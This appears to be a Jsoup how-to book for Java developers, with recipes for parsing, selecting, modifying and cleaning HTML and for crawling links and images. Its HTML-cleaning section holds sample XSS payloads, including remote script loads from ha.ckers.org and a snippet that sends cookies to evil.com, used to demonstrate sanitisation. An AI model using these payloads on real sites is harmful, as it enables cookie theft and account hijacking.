Welcome to Instant Jsoup How-to. As you look around the Web, you will see that many websites and services provide information through RSS, Atom, or a web service API; however, many sites don't offer such facilities. That is why so many HTML parsers have arisen to support web scraping. Jsoup, one of the most popular HTML parsers for Java developers, is a powerful framework that gives developers an easy way to extract and transform HTML content. This book therefore collects the recipes needed to grab web information.
HTML data for parsing can come from different types of sources, such as a local file, a string, or a URL. Let's have a look at how we can handle these types of input for parsing with Jsoup.
Create the Document class structure from Jsoup, depending on the type of input.
If the input is a string, use:
String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>";
Document doc = Jsoup.parse(html);
If the input is from a file, use:
try {
    File file = new File("index.html");
    Document doc = Jsoup.parse(file, "utf-8");
} catch (IOException ioEx) {
    ioEx.printStackTrace();
}
If the input is from a URL, use:
Document doc = Jsoup.connect("http://www.example.com").get();
Include the correct imports at the top.
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
Basically, all the inputs are given to the Jsoup class to parse. For an HTML string, you just need to pass the string as the parameter to the Jsoup.parse() method.
For an HTML file, two parameters are passed to Jsoup.parse(): the first is the File object, which points to the specified HTML file; the second is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri). The baseUri URL is the URL from which the HTML file was retrieved; it is used to resolve relative paths and links.
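As a quick sketch of how baseUri resolves relative links, the following uses the analogous Jsoup.parse(String html, String baseUri) overload; the page content and base URL are made up for illustration:

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch: how baseUri lets Jsoup resolve relative links.
// The HTML snippet and base URL are hypothetical examples.
public class BaseUriDemo {
    static String resolveFirstLink() {
        String html = "<html><body><a href=\"/docs/index.html\">Docs</a></body></html>";
        // The String overload takes the same baseUri parameter as
        // Jsoup.parse(File, charsetName, baseUri).
        Document doc = Jsoup.parse(html, "http://www.example.com");
        // "abs:href" asks Jsoup to resolve the relative href against baseUri.
        return doc.select("a").first().attr("abs:href");
    }

    public static void main(String[] args) {
        System.out.println(resolveFirstLink()); // http://www.example.com/docs/index.html
    }
}
```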
For a URL, you need to use the Jsoup.connect() method. It returns an object implementing the Connection interface; through it, you can easily get the content of the page using the Connection.get() method.
The previous example is pretty easy and straightforward. Parsing with the Jsoup class returns a Document object, which represents the DOM structure of an HTML page, with the root node starting from <html>.
Besides receiving well-formed HTML as input, the Jsoup library also supports input as a body fragment. This can be seen at the following location:
http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)
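A minimal sketch of parsing a body fragment (the fragment text here is made up): Jsoup wraps the fragment in a full html/head/body shell for you.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch: parsing a body fragment rather than a full page.
public class FragmentDemo {
    static String parseFragment() {
        // Only a fragment; Jsoup supplies the html, head, and body shell.
        Document doc = Jsoup.parseBodyFragment("<p>Just a <b>fragment</b></p>");
        return doc.body().text();
    }

    public static void main(String[] args) {
        System.out.println(parseFragment()); // Just a fragment
    }
}
```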
Tip
Downloading the example code
You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.
As the input is ready for extraction, we will begin with HTML parsing using the DOM method.
Let's move on to the details of how it works in Jsoup.
This section will parse the content of the page at http://jsoup.org.
The index.html file in the project is provided if you want to use a file as input instead of connecting to the URL.
The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.
The Jsoup library fully supports the DOM navigation method; it provides ways to find elements and extract their contents efficiently.
Create the Document class structure by connecting to the URL.
Document doc = Jsoup.connect("http://jsoup.org").get();
Navigate to the menu tag whose class is nav-sections.
Elements navDivTag = doc.getElementsByClass("nav-sections");
Get the list of all menu links, which are <a> tags.
Elements list = navDivTag.get(0).getElementsByTag("a");
Extract content from each Element in the previous menu list.
for (Element menu : list) {
    System.out.print(String.format("[%s]", menu.html()));
}
The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02.
Let's have a look at the navigation structure:
html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a
The <div class="nav-sections"> tag is the parent of the navigation section, so calling getElementsByClass("nav-sections") moves to this tag. Since there is only one tag with this class value in this example, we only need to extract the first found element, at index 0 (the first item of the results).
Elements navDivTag = doc.getElementsByClass("nav-sections");
The Elements object in Jsoup represents a collection (Collection<Element>) or a list (List<Element>); therefore, you can easily iterate through it to get each element, which is known as an Element object.
From a parent tag, there are several ways to get to the children. You can navigate from the <ul> subtag, deeper to each <li> tag, and then to the <a> tag; or you can directly query for all the <a> tags. That's how we retrieved the list, as shown in the following code:
Elements list = navDivTag.get(0).getElementsByTag("a");
The final part prints the extracted HTML content of each <a> tag.
Beware of the list value; even if the navigation fails to find any element, the result is never null. It is therefore good practice to check the size of the list before doing any other task.
Additionally, the Element.html() method returns the HTML content of a tag.
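A small sketch of that practice: a lookup that matches nothing still returns an empty Elements list, never null (the class name used here is made up).

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;

// Sketch: Elements is never null, so check size()/isEmpty() before use.
public class EmptyCheckDemo {
    static int countMissing() {
        Document doc = Jsoup.parse("<div class=\"nav-sections\"></div>");
        // No such class in the document: the result is an empty list, not null.
        Elements missing = doc.getElementsByClass("no-such-class");
        return missing.size();
    }

    public static void main(String[] args) {
        System.out.println(countMissing()); // 0
    }
}
```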
Jsoup is quite a powerful library for DOM navigation. Besides the methods mentioned here, other ways of finding and extracting elements are also supported in the Element class. The following are the common methods for DOM navigation:
Methods | Descriptions
---|---
getElementById(String id) | Finds an element by ID, including its children.
getElementsByTag(String tagName) | Finds elements with the specified tag name, including and recursively under the element that calls this method.
getElementsByClass(String className) | Finds elements that have this class, including or under the element that calls this method. Case insensitive.
getElementsByAttribute(String key) | Finds elements that have a named attribute set. Case insensitive. This method has several relatives, such as getElementsByAttributeValue(String key, String value).
getElementsMatchingText(Pattern pattern) | Finds elements whose text matches the supplied regular expression.
getAllElements() | Finds all elements under the specified element (including itself and children of children).
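The navigation methods in the table above can be exercised against a small hand-written page; the HTML below is a made-up example, not the jsoup.org page.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch of the common DOM navigation methods on a tiny made-up page.
public class DomNavDemo {
    static final Document DOC = Jsoup.parse(
        "<div id=\"menu\" class=\"nav\">"
        + "<a href=\"/a\">A</a><a href=\"/b\">B</a></div>");

    static String byId()     { return DOC.getElementById("menu").className(); }
    static int byTag()       { return DOC.getElementsByTag("a").size(); }
    static int byClass()     { return DOC.getElementsByClass("nav").size(); }
    static int byAttribute() { return DOC.getElementsByAttribute("href").size(); }

    public static void main(String[] args) {
        System.out.println(byId() + " " + byTag() + " " + byClass() + " " + byAttribute());
    }
}
```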
We also need to mention the methods used to extract content from an HTML element. The following table shows the common methods for extracting content:
Methods | Descriptions
---|---
id() | This retrieves the ID value of an element.
className() | This retrieves the class name value of an element.
attr(String key) | This gets the value of a specific attribute.
attributes() | This is used to retrieve all the attributes.
html() | This is used to retrieve the inner HTML value of an element.
data() | This is used to retrieve the data content, usually applied for getting content from the <script> and <style> tags.
text() | This is used to retrieve the text content. This method returns the combined text of all inner children and removes all HTML tags, while the html() method keeps them.
tagName() | This retrieves the tag name of the element.
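To make the difference between text(), html(), and data() concrete, here is a small sketch on a made-up document:

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch: text() strips tags, html() keeps them, data() reads script bodies.
public class ExtractDemo {
    static final Document DOC = Jsoup.parse(
        "<div id=\"d\"><b>bold</b> plain</div><script>var x = 1;</script>");

    static String text() { return DOC.getElementById("d").text(); }   // tags stripped
    static String html() { return DOC.getElementById("d").html(); }   // tags kept
    static String data() { return DOC.getElementsByTag("script").first().data(); }

    public static void main(String[] args) {
        System.out.println(text()); // bold plain
        System.out.println(html()); // <b>bold</b> plain
        System.out.println(data()); // var x = 1;
    }
}
```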
The following code prints the corresponding relative path of each <a> tag found in the menu list, demonstrating the use of the attr() method to get attribute content.
System.out.println("\nMenu and its relative path:");
for (Element menu : list) {
    System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href")));
}
Instead of DOM navigation, this recipe uses the CSS selector method. Basically, a CSS selector identifies an element based on how it would be styled in CSS. Let's see how this works.
If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.
Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.
Create the Document class structure by loading the URL:
Document doc = Jsoup.connect(mUrl).get();
Select the <div> tag with the class attribute nav-sections:
Elements navDivTag = doc.select("div.nav-sections");
Select all the <a> tags:
Elements list = navDivTag.select("a");
Retrieve the results from the list:
for (Element menu : list) {
    System.out.print(String.format("[%s]", menu.html()));
}
When you execute this code, it produces the same result as the DOM navigation in the previous recipe.
The complete example source code for this section is available at \source\Section03.
It works like a charm! Well, there is actually no magic here: the selector query gives the direction to the target elements, and Jsoup finds them for you. The select() method does this work so that you don't have to care about the details.
Through the query doc.select("div.nav-sections"), the Document class finds and returns all the <div> tags whose class name equals nav-sections.
It is even simpler when finding children; Jsoup looks up every child, and their children, to find the tags that match the selector. That's how all the <a> tags are selected in step 3. Compared to DOM navigation, this is simpler to use and easier to understand, although developers still need to know the HTML page structure in order to write the CSS selector query.
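A short sketch of a few selector flavors against a hand-written fragment (the HTML is made up to resemble the navigation structure above):

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch: class selectors, descendant selectors, and :contains.
public class SelectorDemo {
    static final Document DOC = Jsoup.parse(
        "<div class=\"nav-sections\"><ul>"
        + "<li><a href=\"/news\">News</a></li>"
        + "<li><a href=\"/download\">Download</a></li>"
        + "</ul></div>");

    static int tagWithClass()   { return DOC.select("div.nav-sections").size(); }
    static int descendants()    { return DOC.select("div.nav-sections a").size(); }
    // :contains matches elements whose text contains the given string.
    static String containsText(){ return DOC.select("a:contains(Down)").first().text(); }

    public static void main(String[] args) {
        System.out.println(tagWithClass() + " " + descendants() + " " + containsText());
    }
}
```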
Please refer to the following pages for the full CSS selector syntax you can use in your application:
Basically, an HTML parser does two things—extraction and transformation. While the extraction is described in previous recipes, this recipe is going to talk about transformation or modification.
In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:
<html>
<head>
<title>Section 04: Modify elements' contents</title>
</head>
<body>
<h1>Jsoup: the HTML parser</h1>
</body>
</html>
into the following result, by adding some minor changes:
<html>
<head>
<title>Section 04: Modify elements' contents</title>
<meta charset="utf-8" />
</head>
<body class=" content">
<h1>Jsoup: the HTML parser</h1>
<p align="center">Author: Johnathan Hedley</p>
<p>It is a very powerful HTML parser! I love it so much...</p>
</body>
</html>
Perform the following tasks:
Add a <meta> tag to <head>
Add a <p> tag for the body content description
Add a <p> tag for the body content author
Add an attribute to the author's <p> tag
Add a class to the <body> tag
The previous tasks will be implemented in the following way:
Add a <meta> tag to <head>.
Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
doc.head().appendChild(tagMetaCharset);
Add a <p> tag for the body content description.
Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);
Add a <p> tag for the body content author.
tagPDescription.before("<p>Author: Johnathan Hedley</p>");
Add an attribute to the author's <p> tag.
Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");
Add a class for the <body> tag.
doc.body().addClass("content");
The complete example source code for this section is available at \source\Section04.
As you can see, the <meta> tag doesn't exist yet, so we need to create a new Element that represents the <meta> tag.
Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");
The constructor of the Element object requires two parameters: the Tag object and the base URI of the element. Usually, the base URI is an empty string when creating the element; you can supply it when you want to specify where this element belongs. One thing worth remembering is that the Tag class doesn't have a public constructor; developers need to create a Tag object through the static method Tag.valueOf(String tagName).
In the next line, the attr(String key, String value) method is used to set the attribute value, where key is the name of the attribute.
doc.head().appendChild(tagMetaCharset);
Instead of looking up the <head> or <body> tag, Jsoup already provides two methods to get these elements directly, which makes it very convenient to append a new child to the <head> tag. If you want to insert the <meta> tag before <title>, use the prependChild() method instead: appendChild() adds a new element at the end of the child list, while prependChild() adds it as the first child of the list.
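A minimal sketch of the difference on a made-up page: prependChild() places the new <meta> before the existing <title>.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.parser.Tag;

// Sketch: appendChild() adds at the end, prependChild() at the front.
public class AppendPrependDemo {
    static String headChildren() {
        Document doc = Jsoup.parse("<head><title>t</title></head><body></body>");
        Element meta = new Element(Tag.valueOf("meta"), "");
        meta.attr("charset", "utf-8");
        // prependChild() puts <meta> before the existing <title>.
        doc.head().prependChild(meta);
        return doc.head().child(0).tagName() + "," + doc.head().child(1).tagName();
    }

    public static void main(String[] args) {
        System.out.println(headChildren()); // meta,title
    }
}
```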
The second task is performed by basically the same code:
Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);
Sometimes, you may find it too complicated to create objects and add them to their parents; Jsoup also supports going the other way around, adding content from an HTML string.
tagPDescription.before("<p>Author: Johnathan Hedley</p>");
The third task is done by directly adding an HTML string as a sibling of the previous <p> tag. The before(Node node) method is similar to prependChild(Node node) but applies to inserting siblings.
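A small sketch of sibling insertion with before() and its counterpart after(), on a made-up paragraph:

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

// Sketch: before() inserts an HTML string as a preceding sibling,
// after() as a following one.
public class SiblingDemo {
    static String order() {
        Document doc = Jsoup.parse("<body><p id=\"mid\">middle</p></body>");
        Element mid = doc.getElementById("mid");
        mid.before("<p>first</p>");
        mid.after("<p>last</p>");
        return doc.body().text();
    }

    public static void main(String[] args) {
        System.out.println(order()); // first middle last
    }
}
```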
The next task is to add the align=center attribute to the author's <p> tag that we've just added. By now you have learned various ways to navigate to this tag; here I choose an easy one, a CSS selector that gets the first <p> tag containing the text Author in its HTML content.
Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");
The previous lines use a pseudo-selector (:contains) to find the tag, and then we add the attribute to it.
The final task can easily be achieved by using the addClass(String className) method:
doc.body().addClass("content");
If you try to add an already existing class name, it won't be added again; Jsoup is smart enough to ensure that a class name appears only once in an element.
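A quick sketch of that behavior on an empty, made-up body: calling addClass() twice with the same name leaves only one copy.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

// Sketch: adding the same class twice keeps only one copy.
public class AddClassDemo {
    static String bodyClass() {
        Document doc = Jsoup.parse("<body></body>");
        doc.body().addClass("content");
        doc.body().addClass("content"); // second call is a no-op
        return doc.body().className();
    }

    public static void main(String[] args) {
        System.out.println(bodyClass()); // content
    }
}
```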
Usually, developers work with Jsoup's default options, unaware that it provides various useful options. This recipe will acquaint you with some commonly used ones.
Here is how to work with connection objects:
Setting userAgent: It is very important to always specify the userAgent when sending HTTP requests. What if the web page displays some information differently on different browsers? The parsing result might differ.
Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();
Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.
When forced to work with different content types:
Document doc = Jsoup.connect(url).ignoreContentType(true).get();
By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.
Configure a connection timeout:
Document doc = Jsoup.connect(url).timeout(5000).get();
The default timeout for Jsoup is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.
Add a parameter request to the connection:
Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();
On dynamic web pages, you need to specify parameters to make a request; the data() method works for this purpose.

Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)
Sometimes, the request needs to be a POST:
Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
Setting the HTML output of the Document class.
This option works through the Document.OutputSettings class.
class.Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html
This class outputs HTML text in a neat format with the following options:
Character set: Get/set document charset
Escape mode: Get/set escape mode of HTML output
Indentation: Get/set indent amount for pretty printing (by space count)
Outline: Enable/disable HTML outline mode
Pretty print: Enable/disable pretty printing mode
For example, to display the HTML output with charset utf-8, an indentation amount of four spaces, HTML outline mode enabled, and pretty printing enabled:
Document.OutputSettings settings = new Document.OutputSettings();
settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true);
Document doc = … // create the DOM object somewhere
doc.outputSettings(settings);
System.out.println(doc.html());
After setting the output format on the Document, its content is rendered in the corresponding format; call the Document.html() method for the output result.

Configure the parser type.
Jsoup provides two parser types: HTML parser and XML parser.
By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.
Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();
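A minimal sketch of the XML parser on a made-up RSS-like string; the Jsoup.parse(String, String baseUri, Parser) overload is used here so the example runs without a network connection, but Jsoup.connect(url).parser(...) works the same way.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.parser.Parser;

// Sketch: parsing an RSS-like XML string with the XML parser.
public class XmlParserDemo {
    static String firstItemTitle() {
        String xml = "<rss><channel><item><title>Hello</title></item></channel></rss>";
        // Empty baseUri; the third argument selects the XML parser.
        Document doc = Jsoup.parse(xml, "", Parser.xmlParser());
        return doc.select("item > title").text();
    }

    public static void main(String[] args) {
        System.out.println(firstItemTitle()); // Hello
    }
}
```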
The previously mentioned options are important ones that developers should know and make use of. However, there are several more utility classes that you can try:
DataUtil: This provides methods to load a file or stream and transform it into a Document object.
StringUtil: This provides methods to handle strings; for example, to search in an array, join a string array, or test a string.
Validate: This provides methods to validate objects, such as testing for empty or null values.
Entities: This provides methods to test or get HTML entities.
Parser: This provides methods to parse HTML into a Document.
To know more about these classes, refer to the Jsoup API documentation.
HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.
If you've never heard about XSS before, I suggest you learn more about it to follow this section.
Our task in this section is to clean the buggy, XSSed HTML:
<html>
<head>
<title>Section 05: Clean dirty HTML</title>
<meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
<meta charset="utf-8" />
</head>
<body onload=alert('XSS02')>
<h1>Jsoup: the HTML parser</h1>
<script src=http://ha.ckers.org/xss.js></script>
<img """><script>alert("XSS03")</script>">
<img src=# onmouseover="alert('xxs04')">
<script/XSS src="http://ha.ckers.org/xss.js"></script>
<script/src="http://ha.ckers.org/xss.js"></script>
<iframe src="javascript:alert('XSS05');"></iframe>
<img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
<img src="www.w3.org/html/logo/img/mark-only-icon.png" />
</body>
</html>
If you open this file in Chrome or Firefox, you will see the XSS in action. Just imagine users opening this XSSed HTML and being redirected to a page the hackers fully control; the hackers could, for example, steal users' cookies, which is very dangerous.
<img """><script>
document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">
There are thousands of ways for XSS attacks to occur, so you should avoid and clean them; it's time for Jsoup to do its job.
Load the Document class structure.
File file = new File("index.html");
Document doc = Jsoup.parse(file, "utf-8");
Create a whitelist.
Whitelist allowList = Whitelist.relaxed();
Add more allowed tags and attributes.
allowList
    .addTags("meta", "title", "script", "iframe")
    .addAttributes("meta", "charset")
    .addAttributes("iframe", "src")
    .addProtocols("iframe", "src", "http", "https");
Create the Cleaner, which will do the cleaning task.
Cleaner cleaner = new Cleaner(allowList);
Clean the dirty HTML.
Document newDoc = cleaner.clean(doc);
Print the new clean HTML.
System.out.println(newDoc.html());
This is the result of the cleaning:
<html>
<head>
</head>
<body>
<h1>Jsoup: the HTML parser</h1>
<script>
</script>
<img />
<script>
</script>">
<img />
<script>
</script>
<script>
</script>
<iframe>
</iframe>
<img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
<img />
</body>
</html>
Indeed, the resulting HTML is very clean and there is almost no script at all.
The complete example source code for this section is available at \source\Section05.
The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow only them into the resulting parse tree. These allowed tags are defined in a Whitelist.
Whitelist allowList = Whitelist.relaxed();
allowList
    .addTags("meta", "title", "script", "iframe")
    .addAttributes("meta", "charset")
    .addAttributes("iframe", "src")
    .addProtocols("iframe", "src", "http", "https");
Here we define the Whitelist, created through the relaxed() method, which contains the following tags:
a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul
If you want to add more tags, use the addTags(String... tags) method. As you can see, the list of tags created through relaxed() doesn't include <meta>, <title>, <script>, or <iframe>, so I added them to the list manually using addTags().
If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.
One special attribute is src, which contains a URL to a file; it's always good practice to restrict its protocols to prevent inline-scripting XSS. Consider this line of the buggy HTML:
<iframe src="javascript:alert('XSS05');"></iframe>
The "src" attribute is supposed to refer to a URL, but here it does not. The fix is to ensure the "src" value is fetched through HTTP or HTTPS. That is what the following line means:
.addProtocols("iframe", "src", "http", "https");
You can chain calls while adding tags or attributes.
While the Whitelist provides the safe tag list, the Cleaner takes the Whitelist as input to clean the input HTML:
Cleaner cleaner = new Cleaner(allowList);
Document newDoc = cleaner.clean(doc);
A new Document class is created after the cleaning is done. The Cleaner only keeps the HTML tags allowed by the Whitelist input; everything else is removed.
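For body fragments, the Whitelist-plus-Cleaner pair is also wrapped by the Jsoup.clean(String, Whitelist) shortcut; here is a minimal sketch on a made-up dirty fragment (note that newer Jsoup versions rename Whitelist to Safelist):

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Whitelist;

// Sketch: Jsoup.clean() applies a Whitelist to a body fragment in one call.
public class CleanDemo {
    static String clean() {
        String dirty = "<p>Hello <script>steal()</script><b>world</b></p>";
        // basic() allows simple text tags like <p> and <b>; <script> is removed.
        return Jsoup.clean(dirty, Whitelist.basic());
    }

    public static void main(String[] args) {
        System.out.println(clean());
    }
}
```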
For convenience, Jsoup supports the following five predefined whitelists:
none(): This allows only text nodes; all HTML will be stripped
simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u
basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, with appropriate attributes
basicWithImages(): This allows the same text tags as basic() and also allows img tags, with appropriate attributes, with src pointing to http or https
relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul
If you pay close attention, you can see that everything inside the <head> tag is removed, even when you allow those tags in the whitelist as shown in the previous code.
Note
The current version of Jsoup is 1.7.2; see lines 45 and 46 of Cleaner.java on GitHub at the following location:
https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45
The cleaner keeps and parses only <body>, not <head>, as shown in the following code snippet:
if (dirtyDocument.body() != null)
    copySafeNodes(dirtyDocument.body(), clean.body());
So, if you want to clean the <head> tag instead of removing everything in it, get the source code, modify it, and build your own package by adding the following two lines:
if (dirtyDocument.head() != null)
    copySafeNodes(dirtyDocument.head(), clean.head());
We are one step closer to data crawling techniques, and this recipe is going to give you an idea on how to parse all the URLs within an HTML document.
In this task, we are going to parse all the links in http://jsoup.org.
Load the Document class structure from the page.
Document doc = Jsoup.connect(URL_SOURCE).get();
Select all the URLs in the page.
Elements links = doc.select("a[href]");
Output the results.
for (Element url : links) {
    System.out.println(String.format("* [%s] : %s", url.text(), url.attr("abs:href")));
}
The complete example source code for this section is available at \source\Section06.
Up to this point, I think you're already familiar with CSS selectors and know how to extract content from a tag or node.
The sample code selects all <a> tags with an href attribute and prints the output:
System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href")));
If you simply print the attribute value with url.attr("href"), the output will match the HTML source exactly, which means some links are relative rather than absolute. The abs:href prefix asks Jsoup to resolve the attribute into an absolute URL.
In HTML, the <a> tag is not the only one that contains a URL; there are other tags too, such as <img>, <script>, <iframe>, and so on. So how do we get their links?
If you pay attention to these tags, you can see that they share a common attribute, src. So the task is quite simple: retrieve all tags containing the src attribute:
Elements results = doc.select("[src]");
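A minimal sketch of that query on a made-up fragment, using abs:src to resolve the collected URLs:

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import java.util.ArrayList;
import java.util.List;

// Sketch: gathering every src-bearing tag from a hand-written page.
public class SrcLinksDemo {
    static List<String> srcUrls() {
        Document doc = Jsoup.parse(
            "<img src=\"/logo.png\"><script src=\"/app.js\"></script><p>text</p>",
            "http://www.example.com");
        // Matches any element carrying a src attribute: img, script, iframe, ...
        Elements media = doc.select("[src]");
        List<String> urls = new ArrayList<>();
        for (Element e : media) {
            urls.add(e.tagName() + " -> " + e.attr("abs:src"));
        }
        return urls;
    }

    public static void main(String[] args) {
        for (String u : srcUrls()) System.out.println(u);
    }
}
```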
Note
The following is a very good link listing from the Jsoup author:
http://jsoup.org/cookbook/extracting-data/example-list-links
Another well-known example of data parsing tasks nowadays is image crawling. Let's try to do it with Jsoup parser.
In this task, we're going to parse a few images from http://www.packtpub.com/.
Load the Document class structure from the page.
Document doc = Jsoup.connect(URL_SOURCE).get();
Select the images.
Elements links = doc.select("img[src]");
Output the results.
for (Element url : links) {
    System.out.println("* " + url.attr("abs:src"));
}
The complete example source code for this section is available at \source\Section07.